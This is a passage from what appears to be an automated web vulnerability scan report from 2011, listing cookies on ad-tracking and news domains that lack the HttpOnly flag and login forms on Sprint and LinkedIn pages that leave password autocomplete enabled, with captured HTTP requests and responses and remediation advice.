rtc_UWJs=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKlxLHFKzz4/0koCkSq5JBQoSmi7zZNoLT0dEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgq9z/0E1nIO9J9fupr6fHiqjuefo+lRV1atV4Hbe4J0B6z/RoE1OlugGgSP3MMlt9IUJJODkKZG3Nw4/m9kHTtC0hHopLYwirAifOKc5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGbzaZd2dky0d4PEM7QRN8YWclW7vMsiT9xDxB5BqTRyycw9kjP7n9k0mBN23/26VyDWsQXbFP9hc6xcdJ56gbc9aoDyd417qJh1f5VYyOgv3kiC8XFanPbQJ092ArYD50B0UuBaXIAGAg5g=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
udm_0=MLvv7iXuYS5npS5IdtJ9rYUnBG1JihVUWLZDwXDpfLby5LNpTzBgDsiqygfVxd+K709LxniKKr1/Jh0PZqrISRqeT7E3J/DikjgckzjZlb25WiMcZffZLOF2S/dP5ZcaSUyjrK5OU8eE/Wavz/TpePFNMR347DHYy3XTsgP5SOgfLi2GwOwvgwSwPLVp1lF3lYOUw6f71CvjHp+Rh4fhQCYkGhqAutVPhz+vTCxd0qyoBvHmxrcfZeCR+WPhx0hLfBQHIyR0lAybjT7WrbQdKQ1p21mwmYaKqD2ggWy/bPOUy7AIPoEwDd9Al3GUd/6WwYb6ifbYlDYxeMF8Gs4bgf44Lpr3AhvptLLNqAoF2xQFpyDXjMmuv9hPf2Ycb7kEPXmvqczS7iXwY+vPDiWLLcpHGbvlx38UVHa9EG7ByiyAurjCyLYLxlbjjX/DO1uknbOYlan89xrt3PsPSCciR/gs9XSoA+k3/mLyBOxjg1ZwmWwNhi5JUchRIQG3tn1ian+yYvzGpRivBsNAhhDeX+STD7boBawdVLIKsdraSo/2y0nY1qbU; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.61. http://pixel.mathtag.com/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ts=1315097792; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:56:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.62. http://r.casalemedia.com/rum previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.casalemedia.com
Path:	/rum

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CMID=e9e8c1d58f5f3be19a1c66cf;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
CMRUM2=04000000002925993182975414771;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
CMST=TmLJ305izMYG;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:56:38 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.63. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Tue, 03-Sep-2013 00:56:48 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.64. http://r.turn.com/r/bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=8071372312438671107; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:58:56 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=8071372312438671107; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:58:56 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:58:55 GMT

GIF89a.............!.......,...........D..;

12.65. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:47:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.66. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/cms/id/0/ddc/1/pid/43/uid/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=6981538011179690654; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:57:37 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=6981538011179690654; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:57:37 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:57:36 GMT

GIF89a.............!.......,...........D..;

12.67. http://rma-api.gravity.com/v1/beacons/initialize previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rma-api.gravity.com
Path:	/v1/beacons/initialize

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vaguid=172d38ad2d9b9b5aa42030c637b39839; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.68. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lgtix=BgABADMBSQABADMBHAADADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:52:19 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.69. http://sitelife.usatoday.com/ver1.0/Content/direct/scripts/DirectProxyFast.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/direct/scripts/DirectProxyFast.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/direct/scripts/DirectProxyFast.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983; s_ppv=11; __qca=P0-1950655009-1315096993908; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fcommunities%25252Fcampusrivalry%25252Fpost%25252F2011%25252F09%25252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%25252F1%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Fcommunities%25252Fcampusrivalry%25252Ftopics_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 63167
Content-Type: application/x-javascript
Last-Modified: Sat, 03 Sep 2011 08:35:54 GMT
Accept-Ranges: bytes
ETag: "0116f7e146acc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:47:50 GMT
Connection: close

...
if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={};}YAHOO.namespace=function(){var A=arguments,E=null,C,B,D;for(C=0;C<A.length;C=C+1){D=A[C].split(".");E=YAHOO;for(B=(D[0]=="YAHOO")?1:0;B<D.length
...[SNIP]...

12.70. http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAIAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAADjNYk7NyWJOBAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAAA4zWJOzcliTgAAAAA-; path=/; expires=Wed, 01-Sep-2021 00:58:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif?&dcsdat=1315097328762&dcssip=www.reuters.com&dcsuri=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&dcsref=http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&WT.co_f=50.23.123.106-4086325760.30173190&WT.vtid=50.23.123.106-4086325760.30173190&WT.vtvs=1315097075506&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Notre%20Dame,%20Michigan%20stadiums%20cleared%20due%20to%20storms%20|%20Reuters&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1233x1037&WT.fv=10.3&WT.slv=Unknown&WT.tv=8.6.0&WT.dl=0&WT.ssl=0&WT.es=www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&WT.cg_n=News%20-%20US&WT.cg_s=domesticNews&WT.vt_f_tlh=1315097075&ChannelList=domesticNews;Disaster;Honda;Inspiration;everything;treasuryMarkets;Deals;Shell;Amtrak;Amtrak2;yahoo3;VerizonMap;echoActivityStream;ShellEnergy;Hyundai;everythingButHugin;SprintNow;OutloudFeed;CFA;samsung&ModID=domesticNews|Text|13827288_Most%20Read%20Articles;domesticNews|Text|13827289_Most%20Shared%20Articles;domesticNews|Text|13827290_Most%20Discussed%20Articles;domesticNews|Text|13827291_Most%20Watched%20Videos;domesticNews|Text|10036174_Related%20News%20%28Auto%29;domesticNews|Text|13483695_Related%20Topics&ModImp=1&VBC=cfa&ContentType=Text&ContentID=USTRE78222D20110904&ContentChannel=domesticNews&ContentID_domesticNews=USTRE78222D20110904&ContentHeadline=Notre%2BDame%2C%2BMichigan%2Bstadiums%2Bcleared%2Bdue%2Bto%2Bstorms&PageNumber=1&PageTotal=1&rChannel=News&rCountry=BETAUS&DartZone=us.reuters/news/us/article HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAIAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAM3JYk7NyWJOBAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADNyWJOzcliTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 00:58:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAIAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAADjNYk7NyWJOBAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAAA4zWJOzcliTgAAAAA-; path=/; expires=Wed, 01-Sep-2021 00:58:32 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

12.71. http://sync.adap.tv/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.adap.tv
Path:	/sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A57%3A27+PDT+2011:32-Compatible=true,key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:44:07 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.72. http://sync.mathtag.com/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ts=1315097752; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:55:52 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?mt_exid=2&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

12.73. http://syndication.mmismm.com/tntwo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://syndication.mmismm.com
Path:	/tntwo.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

U=WyBPG2WuR0m9hGPSaL94eQ--; expires=Sat, 03-Sep-2016 07:13:33 GMT; path=/; domain=.mmismm.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.74. http://tacoda.at.atwola.com/rtx/r.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:05:45 GMT; domain=.at.atwola.com
Tsid=0^1315097086^1315100145|17778^1315097086^1315098886|11684^1315097306^1315100145; path=/; expires=Sun, 04-Sep-11 01:35:45 GMT; domain=tacoda.at.atwola.com
TData=99999|^; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=tacoda.at.atwola.com
N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=tacoda.at.atwola.com
ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=.at.atwola.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.75. http://tags.bluekai.com/site/4195 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/4195

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bklc=4e62d0a8; expires=Tue, 06-Sep-2011 01:13:12 GMT; path=/; domain=.bluekai.com
bk=R+zBw0JX+9Fze1lp; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
bkc=KJh5ppXnxPWROFe77YEdRf+Jag/jk/tDhVCxEanrn529VjuuyVHHwGsJsm8vRzBQBFAvJGwJKUWbFUzT7UfNFm2pMC1cMZIO8XVruNCyke121n52h+6Wzn1Aon/9FkTsruZFwxXedGe9Tt0znTYjX+G85uoeRcKZFo2q/KbZhpuF4PJn+AkQXB2cl7C1KKtAKrXIJksI5R0MlaRSpeuFdRG928HWRtNX39oZNIBjA4rS8S8myDh2tAcbIyvyIXqc1U5+hWtl2Agj5qknWtf3bdf29EhDj89=; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACXnxf/99T1/x8JjZGZJLPkiLoZCujvOLSkaig7oiQ+J4Q9iBHVZ; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.76. http://tr.adinterax.com/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tr.adinterax.com
Path:	/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adxid=01345f4e62cacd40; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
adxf=696749@1@221; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.77. http://tu.connect.wunderloop.net/TU/1/1/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tu.connect.wunderloop.net
Path:	/TU/1/1/1/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:48:10 GMT; domain=.wunderloop.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.78. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
BizoData=Pp1FHRK43ZweORIlfkWqu9Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZiiM5m7MKDWeaj5XcunNcMDa7Re6IGD4lFbK4oBwEGr9Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspmIzmbswoNZ5qPldy6c1wwH4DELwm2ipwN9AFjATkbkUDTbwiiAhQOisLU5UVO9T0RLQPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9s3m5pebWcHCAieie; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.79. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/auto/sacbee/CA/Sacramento.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASC=1315098655:2; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13. Password field with autocomplete enabled previous next
There are 10 instances of this issue:

http://community.sprint.com/baw/community/buzzaboutwireless
http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support
http://community.sprint.com/baw/community/sprintblogs
http://community.sprint.com/baw/groups
http://community.sprint.com/baw/index.jspa
http://community.sprint.com/baw/reviews.jspa
https://www.linkedin.com/secure/login
http://www.sprint.com/index_c.html
https://www.sprint.net/performance/
https://www.sprint.net/performance/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

13.1. http://community.sprint.com/baw/community/buzzaboutwireless previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/buzzaboutwireless

Issue detail

The page contains a form with the following action URL:

https://mysprint.sprint.com/entrycheck/login.fcc

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

GET /baw/community/buzzaboutwireless HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:45 GMT
Server: Apache-Coyote/1.1
X-JAL: 186
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130313b31342c323130323b; Expires=Tue, 04-Oct-2011 01:18:45 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=346147 t=1315099124916508
Connection: close
Content-Length: 138024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
       <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
           <fieldset>
...[SNIP]...
<br />
                   <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

13.2. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The page contains a form with the following action URL:

https://mysprint.sprint.com/entrycheck/login.fcc

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:54 GMT
Server: Apache-Coyote/1.1
X-JAL: 270
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034353b31342c323130313b31342c323130323b31342c323032383b31342c323037333b; Expires=Tue, 04-Oct-2011 01:18:54 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=424084 t=1315099134687160
Connection: close
Content-Length: 156782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
       <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
           <fieldset>
...[SNIP]...
<br />
                   <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

13.3. http://community.sprint.com/baw/community/sprintblogs previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/sprintblogs

Issue detail

The page contains a form with the following action URL:

https://mysprint.sprint.com/entrycheck/login.fcc

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

GET /baw/community/sprintblogs HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:46 GMT
Server: Apache-Coyote/1.1
X-JAL: 95
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130323b31342c323130313b; Expires=Tue, 04-Oct-2011 01:18:45 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=222160 t=1315099125905413
Connection: close
Content-Length: 115606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
       <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
           <fieldset>
...[SNIP]...
<br />
                   <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

13.4. http://community.sprint.com/baw/groups previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/groups

Issue detail

The page contains a form with the following action URL:

https://mysprint.sprint.com/entrycheck/login.fcc

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

GET /baw/groups HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:19:01 GMT
Server: Apache-Coyote/1.1
X-JAL: 163
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=310969 t=1315099141159580
Connection: close
Content-Length: 99076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
       <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
           <fieldset>
...[SNIP]...
<br />
